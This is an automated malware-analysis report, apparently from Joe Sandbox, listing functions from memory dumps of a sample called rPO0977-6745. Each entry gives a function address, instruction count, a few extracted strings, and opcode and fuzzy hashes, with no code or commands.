Function 06BB8B96 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

PHq, xrefs: 06BB8E42
PHq, xrefs: 06BB8E53

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: fea3e20f71c273f12082d8ab297221396370fe3762b0cc17b6c2d3e162396146
Instruction ID: 295548dba40ba12f4f1b213298871f9d14346fe503d9a4ac35522f569b5e7e93
Opcode Fuzzy Hash: fea3e20f71c273f12082d8ab297221396370fe3762b0cc17b6c2d3e162396146
Instruction Fuzzy Hash: 8D9106B0E01318DFDB68CFA9D884ADDBBF2BF89300F14916AD409AB254DB345946CF50

Function 06BB0D48 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d65e35cbd647d63287be97a2c10945e34b5b6dea0e3956b299a2086a388c2fc
Instruction ID: 8476ebfeab8ca69e492368a5b5b8cccfc5013ca6e613313628782a4ba526db6f
Opcode Fuzzy Hash: 6d65e35cbd647d63287be97a2c10945e34b5b6dea0e3956b299a2086a388c2fc
Instruction Fuzzy Hash: 2F827F74E012298FEBA4DF69D894BDDBBB2BF49300F1481EA940DA7264DB715E81CF41

Function 0144E431 Relevance: .7, Instructions: 714COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6318476a2bee83af6369e5319c745a44ef5697a026bcf71cbebb070d4c8f554f
Instruction ID: 1e1fe1fe711f520c595534bfcb4deddd1dba419f4663726c2295221c55369486
Opcode Fuzzy Hash: 6318476a2bee83af6369e5319c745a44ef5697a026bcf71cbebb070d4c8f554f
Instruction Fuzzy Hash: 0F72D174E00229CFEB64DF69C994BD9BBB2BB49300F1481EAD449A7365DB349E81CF50

Function 06BB85B0 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9093ade595525199134e9d759247d7b20f64443115bb3ac9f1b62868a6e0f24b
Instruction ID: 61f8680576869afd5aec552ca342f873c345d639f6b1f33a96b6c1475ee9b343
Opcode Fuzzy Hash: 9093ade595525199134e9d759247d7b20f64443115bb3ac9f1b62868a6e0f24b
Instruction Fuzzy Hash: C9E1C3B4E01218CFEB64DFA5C954BDDBBB2BF89304F1081AAD409AB394DB755A85CF10

Function 0144F778 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c422a3619bedb44598f359ff50fd35a571d9cfcc6dac74144559d5a8c7b485
Instruction ID: 3a52529b6908e503dc420f8c8ae5aa24f919289f14cf38aa6e3de583a51bfe2d
Opcode Fuzzy Hash: 28c422a3619bedb44598f359ff50fd35a571d9cfcc6dac74144559d5a8c7b485
Instruction Fuzzy Hash: 3FD1A374E00218CFEB24DFA9D954B9DBBB2BF89304F1081AAD809AB365DB345D85CF11

Function 06BBB290 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e654410ced70e377d33f21aa0ec078b681aa9c89cc138d068b3b470cd95bd772
Instruction ID: 2574b95710a8aaf5f7783f7bc292c32bd2d80622f58acb12790c140b1c7964a2
Opcode Fuzzy Hash: e654410ced70e377d33f21aa0ec078b681aa9c89cc138d068b3b470cd95bd772
Instruction Fuzzy Hash: 56A1A2B4E012188FEB68CF6AC944BDDBAF2BF89300F14D0AAD409A7254DB745A85CF51

Function 06BBD218 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b1ea6f6b35da62a150fd2ab0ea13c981505dad391b762c66fe88eddb89f12b
Instruction ID: a17854f521268611a31ee80dbfd78a7f00b4b3ab6c47814b5283868578b0387c
Opcode Fuzzy Hash: c8b1ea6f6b35da62a150fd2ab0ea13c981505dad391b762c66fe88eddb89f12b
Instruction Fuzzy Hash: 49A192B4E012188FEB68CF6AC944BDDBAF2BF89300F14D0AAD408A7255DB745A85CF50

Function 06BB9FB0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4b6cf341fead3a726de376e68958a272c97e7d5a6178b060bd8be2b2d4c9ae
Instruction ID: 8b5315379299f3fc42c2315741b9e59adf43c4c29b2155ca652355ec0401ce6f
Opcode Fuzzy Hash: 9c4b6cf341fead3a726de376e68958a272c97e7d5a6178b060bd8be2b2d4c9ae
Instruction Fuzzy Hash: 79A194B5E012188FEB68CF6AC944BDDBAF2AF89300F14D0AAD40DA7254DB745A85CF51

Function 06BBBF30 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6503df118ee93c344ea905eb5e9adcab9c006a47f1588d3af2bb74d3392986eb
Instruction ID: 030e9df6f226fbabbb6b7c786c85b2f7ac68cedd33438df14522e479cddf46b4
Opcode Fuzzy Hash: 6503df118ee93c344ea905eb5e9adcab9c006a47f1588d3af2bb74d3392986eb
Instruction Fuzzy Hash: 0FA194B5E012188FEB68CF6AC945BDDBBF2AF89300F14D0AAD40CA7254DB745A85CF50

Function 06BBB8E0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ad70b7b546c4de04dda33d0627099c18a8553ebf1d0714beb8506831e8655a5
Instruction ID: 08ad2c163f0f293de0f65007a1704aca13a773264b2aa90523c911bf80cf8173
Opcode Fuzzy Hash: 4ad70b7b546c4de04dda33d0627099c18a8553ebf1d0714beb8506831e8655a5
Instruction Fuzzy Hash: EBA192B4E012188FEB68CF6AC944BDDFAF2BF89300F14D0AAD408A7254DB705A85CF50

Function 06BBC580 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33579d30f38427f32cb5def8ef1ac08ad6b5438e2b91318574c9b74045bea8c4
Instruction ID: 2a5070c666db3a871a82a13809959a23c041f26c961f8c75bb39c4f58b03776a
Opcode Fuzzy Hash: 33579d30f38427f32cb5def8ef1ac08ad6b5438e2b91318574c9b74045bea8c4
Instruction Fuzzy Hash: 74A191B5E012188FEB68CF6AC944BDDBBF2AF89300F14D0AAD40CA7255DB705A85CF51

Function 06BBA600 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a45fda7f5600a9b50c2fcdc746f628d42c571b884244e63c574f52cfaefde4
Instruction ID: e4ab5250b6f7f9026a48747f24430059b6bd41173299b1ba873f388687b4938e
Opcode Fuzzy Hash: 48a45fda7f5600a9b50c2fcdc746f628d42c571b884244e63c574f52cfaefde4
Instruction Fuzzy Hash: 6DA192B4E012188FEB68CF6AC944BDDFAF2AF89300F14D0AAD409A7255DB745A85CF50

Function 06BBCBD0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19cab6917b6d366fe4e998227a014ae49974231aceb4488916cb9d3e112bf87b
Instruction ID: 4d246a7461f58537269bcd4b30798eac0252a02989163b16fd40781ba5fb7b6c
Opcode Fuzzy Hash: 19cab6917b6d366fe4e998227a014ae49974231aceb4488916cb9d3e112bf87b
Instruction Fuzzy Hash: 43A192B4E012188FEB68CF6AD945BDDBBF2AF89300F14D0AAD408B7254DB745A85CF50

Function 06BBAC48 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3287b287e2e12c3770f99c3f814074b465c1d545296b332f98a719af76f39b8
Instruction ID: 4e4e4d381efb12f9ae8072ce8786b9ebd4824e3c3df7c05631f0a3a020583168
Opcode Fuzzy Hash: d3287b287e2e12c3770f99c3f814074b465c1d545296b332f98a719af76f39b8
Instruction Fuzzy Hash: E6A192B5E012188FEB68CF6AD944BDDFBF2AF89300F14D1AAD408A7254DB745A85CF50

Function 06BBAC37 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37b6e1f973e5badcddb4a5dc4124a1b8ba4ffdcf6b5dcc3f0873d6121b3dfa1
Instruction ID: 03d4a2c2e5856f9b9bddca0843d348c836ec519e9d237292dd454cac5e6017f8
Opcode Fuzzy Hash: b37b6e1f973e5badcddb4a5dc4124a1b8ba4ffdcf6b5dcc3f0873d6121b3dfa1
Instruction Fuzzy Hash: 678193B4E006188FEB68CF6AC945BDDBBF2AF89200F14D1EAD40DA7254DB744A85CF51

Function 06BBCBC0 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93edd48da4186b36baa44c7cc1b2fcd87fe63d9294df467e7f2fc4c0aadd39d5
Instruction ID: 85c628890d6b1ab1c22dee1f3cd07eeba8898f84ec3dec7ad8fa3b70e0759bcb
Opcode Fuzzy Hash: 93edd48da4186b36baa44c7cc1b2fcd87fe63d9294df467e7f2fc4c0aadd39d5
Instruction Fuzzy Hash: B281A8B0E006188FEB68CF6AC945BDDBAF2AF89300F14D0EAD40DA7254DB704A85CF50

Function 06BBA5F0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 200a7cd8d4cd747b18435fe1d703ac2e685b57e3630aa563c6c3e182e5a30f1d
Instruction ID: f7469df6a35d3113442cf19e85e647b8a78ac0deb63bcb35f3aaa623878573b0
Opcode Fuzzy Hash: 200a7cd8d4cd747b18435fe1d703ac2e685b57e3630aa563c6c3e182e5a30f1d
Instruction Fuzzy Hash: E77183B0E006188FEB68CF6AC945B9DFAF2AF89300F14C1AAD40DA7255DB744A85CF50

Function 06BB85A0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4208db602fea83b9355a79b279d63a7c4e1ba93dbff20606499473287fc4e813
Instruction ID: ef477d55d3f97da7695d13bc44b25a5a66b2c2955dac20a06b295421c05a502a
Opcode Fuzzy Hash: 4208db602fea83b9355a79b279d63a7c4e1ba93dbff20606499473287fc4e813
Instruction Fuzzy Hash: EB41C3B0E00208CBEB58DFAAC9547EEBAF6BF88304F14D16AC418BB294DB754945CF54

Function 06BB9FA0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dee82dc6930e808ea64d5146c00ef9adcd0c25fd65ee679396be6a5aaf9c498d
Instruction ID: 247bf00e2e03d6dbbed5107cc404a08c4e6c3ab37b032d727842bef2fc795dcc
Opcode Fuzzy Hash: dee82dc6930e808ea64d5146c00ef9adcd0c25fd65ee679396be6a5aaf9c498d
Instruction Fuzzy Hash: 6B4147B1E016188BEB58CF6BC9457DAFAF3AFC9310F14C1AAD50CA6264DB740A858F51

Function 06BBB281 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782f5c1c1e9e026486250bfeee52552fbb93a4e5cd3b0bcdc4341c4223b4a641
Instruction ID: ca6a32abdcb344bd9ef7039feead9aff7afd6d730659b4025bf7e7d187e62483
Opcode Fuzzy Hash: 782f5c1c1e9e026486250bfeee52552fbb93a4e5cd3b0bcdc4341c4223b4a641
Instruction Fuzzy Hash: 304149B1D016188BEB68CF6BC9557DEFAF3AFC9310F14C1AAC50CA6264DB740A858F50

Function 06BBBF20 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27dce1a7854f0c10f8f32faeb5e3a62fe0be17578d5069aab93ca8d87a947ccc
Instruction ID: 09fde6f3ba193fce66f2a29866582f86cdd3dca0d27769ba3c6eabcb4c05f25f
Opcode Fuzzy Hash: 27dce1a7854f0c10f8f32faeb5e3a62fe0be17578d5069aab93ca8d87a947ccc
Instruction Fuzzy Hash: B3415BB1D016188BEB58CF6BD9557DEFAF3AFC8300F14C1AAC50CA6254DB7449858F51

Function 06BBB8D0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b80319525f177dd7ebf3c6f0e2af1a3f3cd4d1833fc76386cbb0d0510d5a2cd0
Instruction ID: 18e59513770403c77bb9b70d4831298e05c3dcbf8d03ce922c69762606e59177
Opcode Fuzzy Hash: b80319525f177dd7ebf3c6f0e2af1a3f3cd4d1833fc76386cbb0d0510d5a2cd0
Instruction Fuzzy Hash: DC4169B1E016188FEB58CF6BC9457DAFAF3AFC8300F14C1AAC50CA6264DB744A858F50

Function 06BBC570 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d0719747ecbf8ab35326a1a747081e6db93810354b2326f14a35ab81eb3d32d
Instruction ID: 3e2eb65bb0f3dece0fe3fff41d3b8d61ee429a32663db9b86932ed1cdff5b1e7
Opcode Fuzzy Hash: 4d0719747ecbf8ab35326a1a747081e6db93810354b2326f14a35ab81eb3d32d
Instruction Fuzzy Hash: EC4158B1D016188BEB58CF6BC9457DAFAF3AFC9300F14C1AAC50CA6264DB740A85CF51

Function 06BBD20A Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1333c4c6a7cde40d367512c19b2144ff495f02f2d54674a21bb64b2d918df521
Instruction ID: 11b9a66bcbe538b50db4875505ec0ee0a839633c94966133c4f704fe3728135a
Opcode Fuzzy Hash: 1333c4c6a7cde40d367512c19b2144ff495f02f2d54674a21bb64b2d918df521
Instruction Fuzzy Hash: 744149B1E016188BEB58CF6BC9557DAFAF3AFC9300F14C1AAC50CA6264DB744A858F51

Function 01446E58 Relevance: 10.5, Strings: 8, Instructions: 475COMMON

Download Yara Rule

Strings

(oq, xrefs: 01446E96
(oq, xrefs: 01447377
,q, xrefs: 01447308
,q, xrefs: 014472F8
(oq, xrefs: 01446F7D
(oq, xrefs: 0144701A
(oq, xrefs: 01447367
(oq, xrefs: 01446F51

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: 32630b0a42ff24a94cfc4b1053278c233bc254b09a01a4558c176f6b1ca63893
Instruction ID: bb8acf0e6c83d2542be5f166670e6c9ac6c99f47ca51df21b0b195eb479f0904
Opcode Fuzzy Hash: 32630b0a42ff24a94cfc4b1053278c233bc254b09a01a4558c176f6b1ca63893
Instruction Fuzzy Hash: 95125730A002099FEB25CF69D984AAEBBF2FF49315F15855AE905DB361DB30ED42CB50

Function 014477F0 Relevance: 3.2, Strings: 2, Instructions: 690COMMON

Download Yara Rule

Strings

$q, xrefs: 01448337
$q, xrefs: 01448314

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 4ab3a6881865ef1d12db470d785c2e84334b5bb8484b70764a871acc2120c15d
Instruction ID: 314821eca3138463e9a4dec3d58c4c9ca19f58b14d0034c0c98473848526e3f9
Opcode Fuzzy Hash: 4ab3a6881865ef1d12db470d785c2e84334b5bb8484b70764a871acc2120c15d
Instruction Fuzzy Hash: E952FC74A00219CFEB249BA4C964BDEBB72FF84300F1081AAC10A6B3A5DF355D45DF66

Function 06BBF211 Relevance: 3.1, Strings: 2, Instructions: 605COMMON

Download Yara Rule

Strings

Teq, xrefs: 06BBF7AE
Teq, xrefs: 06BBF7D5

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: f7ca47ecd43dfc7b4a657d38a302539566293e28d67fad8130a29044c967b78c
Instruction ID: 06c2076c87dab0def8a26efb8adcfd85b04c70e8be9892a5df5f7adc02cfc25c
Opcode Fuzzy Hash: f7ca47ecd43dfc7b4a657d38a302539566293e28d67fad8130a29044c967b78c
Instruction Fuzzy Hash: 2A52A278A01229DFDB65EF64D964BEDBBB2BB89300F1040E9D80967368CB355E81CF54

Function 06BBF20F Relevance: 3.1, Strings: 2, Instructions: 602COMMON

Download Yara Rule

Strings

Teq, xrefs: 06BBF7AE
Teq, xrefs: 06BBF7D5

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: a65de5f85c78175f35615adb363432a01b711e251e057a29efd53bf66ac21a03
Instruction ID: 69e07c4050684b7ba7257ae6a29fcf2de96a874fc3d0fb555ceb62d1bf274ce2
Opcode Fuzzy Hash: a65de5f85c78175f35615adb363432a01b711e251e057a29efd53bf66ac21a03
Instruction Fuzzy Hash: A652A178A01229DFDB65EF64D964BEDBBB2BB89300F1040E9D80967368CB355E81CF54

Function 014487E9 Relevance: 2.8, Strings: 2, Instructions: 328COMMON

Download Yara Rule

Strings

4'q, xrefs: 01448811
4'q, xrefs: 01448837

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 357ec34d1a47d56f5b1100198b354f77185209d4506fa8d6d4aa0dac8f107c45
Instruction ID: 90f6854dca0f13e44589dfae91899add3591e69ff5a64198a545c8d4888d4472
Opcode Fuzzy Hash: 357ec34d1a47d56f5b1100198b354f77185209d4506fa8d6d4aa0dac8f107c45
Instruction Fuzzy Hash: 53B181703105428FFB259BADD958B3A3A9AEF85604F18406BF602DF3B1EA75CC42C752

Function 014456A8 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

Hq, xrefs: 01445793
Hq, xrefs: 014457C6

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: f0483921c7cd868210938ed29735a68da6da0eb0a81321764ef159c984924c19
Instruction ID: 3b29226306add769a71809fb0e45162ce41d8c7edd34fbff6cf31a62b824174f
Opcode Fuzzy Hash: f0483921c7cd868210938ed29735a68da6da0eb0a81321764ef159c984924c19
Instruction Fuzzy Hash: F6B19B317042158FEF259F68D894B6E7BA2BB89218F14852AE506DF3B5DF74CC02C791

Function 01445C08 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

,q, xrefs: 01445CE8
,q, xrefs: 01445CDE

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 16f6485d3ac304363a45a2036d3f90bb5c7dffa64db14d1e8d092071bb1870a6
Instruction ID: 07c3695b42d857f14bea82a1828defcaf16861c76d6436298ef400a11a35470c
Opcode Fuzzy Hash: 16f6485d3ac304363a45a2036d3f90bb5c7dffa64db14d1e8d092071bb1870a6
Instruction Fuzzy Hash: 45819271A005059FEF24DF6DC488AAABBB2BF89214B24C16AD506DF375DB31EC42CB51

Function 06BB1F80 Relevance: 2.7, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

LRq, xrefs: 06BB20C9
LRq, xrefs: 06BB1F9C

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: LRq$LRq
API String ID: 0-3710822783
Opcode ID: 8ade0a9c2226d416e4c7219abbd6b60f4299df141226b9ef289bf25ed802dcbd
Instruction ID: 7017eeb1883bd08ac4d5d509b130dcd513409173cf0862e7c228760a00067eab
Opcode Fuzzy Hash: 8ade0a9c2226d416e4c7219abbd6b60f4299df141226b9ef289bf25ed802dcbd
Instruction Fuzzy Hash: 9781EF74B001058FCB58EF78D854ABE77B2FF88600B1591AAE516DB3A1DB71DD02CB91

Function 06BB94B8 Relevance: 2.7, Strings: 2, Instructions: 210COMMON

Download Yara Rule

Strings

(&q, xrefs: 06BB95D3
(q, xrefs: 06BB9692

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: (&q$(q
API String ID: 0-2464455664
Opcode ID: a9c102eec0ba0fb1f5a95b9307466e3089bbb22d8d95dbd89b45c0396bed7fbb
Instruction ID: 9bbb48d99c068858845f81bf88528cf9a71156cf355094fa5c5cb7d7aa97d30b
Opcode Fuzzy Hash: a9c102eec0ba0fb1f5a95b9307466e3089bbb22d8d95dbd89b45c0396bed7fbb
Instruction Fuzzy Hash: B3719E71F002199BDB19EFA9D851AEEBBB2AFC9700F14442AE506AB380DF749D41C7D1

Function 01443428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xq, xrefs: 01443435
Xq, xrefs: 0144345E

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: 877edbc88cfb28c1835a2e8bc66fe9f3ddf951bef4aa936715a4c4a09d03d944
Instruction ID: 3e115e48bf00efd041fa8869da70b07702e70bb475c12dddfe7f6e0e1073423e
Opcode Fuzzy Hash: 877edbc88cfb28c1835a2e8bc66fe9f3ddf951bef4aa936715a4c4a09d03d944
Instruction Fuzzy Hash: 8F31C875B003358BFB295E6949552BF65DABBC4A10F18403FD906C73A1DF74CC4186A1

Function 01440C8F Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

LRq, xrefs: 01440E5E

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 7714ffbf624cbbefb1156bea0b7c8c994f0acabf9d9f7ca71f073441fa02b8ae
Instruction ID: 6fbb272c56fd8ad273d19a72a5ae255ef377ab3b803e03d3612e1e6d16f13f59
